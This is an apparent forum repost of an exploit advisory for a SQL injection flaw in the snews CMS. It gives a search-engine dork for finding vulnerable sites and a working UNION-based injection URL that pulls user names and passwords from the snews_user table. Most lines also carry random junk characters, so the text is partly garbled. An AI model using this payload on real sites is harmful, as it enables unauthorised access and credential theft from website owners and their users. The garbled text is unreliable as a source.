标题: CMS snews SQL Injection Vulnerability
; O. H/ s1 C# t5 m( I1 [作者: By onestree
: y: {. y1 P" D3 K下载地址 : http://snewscms.com/+ N5 m* z3 t$ E" L
测试平台 : ubuntu 12.10 / win 7% T1 K0 ^: E# m- |" ?
关键词: inurl:"tanyakan pada rumput yang bergoyang", c4 c3 z% i R" W: Y
, |; s) w5 r+ Y w1 R% Z0 m; X
$ T P% G* p8 `6 Q9 d: O9 h7 }4 n C: ]*************************************************************7 W% V& Y. `$ k4 @# e9 l. l
- C" {9 G( ?# cSQL poc:
( c, y4 ]- L% n+ h1 G ; s' N) O0 G% @' Z: `' A6 v
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
+ R k+ l6 J7 r- D5 ]) C 2 c1 }% L" g$ ^* x
示例
6 ~6 V# `# q$ N9 r 4 j0 P3 G; X" H$ m. s+ c( Q2 I( t
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
" n4 M7 P" c6 W5 t* l ' p/ r2 z- d' J! [' |& o
8 q% m) D, b) K7 S
致谢:
: p9 r3 {" N$ _+ D! u % W- W1 b" m/ y) z
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
1 l8 r7 |- [; O
, {) _+ \; r, t indonesiancoder - moeslimh4x0r - go-coder
" G. y B5 v* E+ A% r. I" t8 z
# ~, [; B1 y V. t f$ Lspesial my hunny :*4 S; b( P& w1 W% G. q
|
发表于 2013-1-23 08:55:06
收藏
支持
反对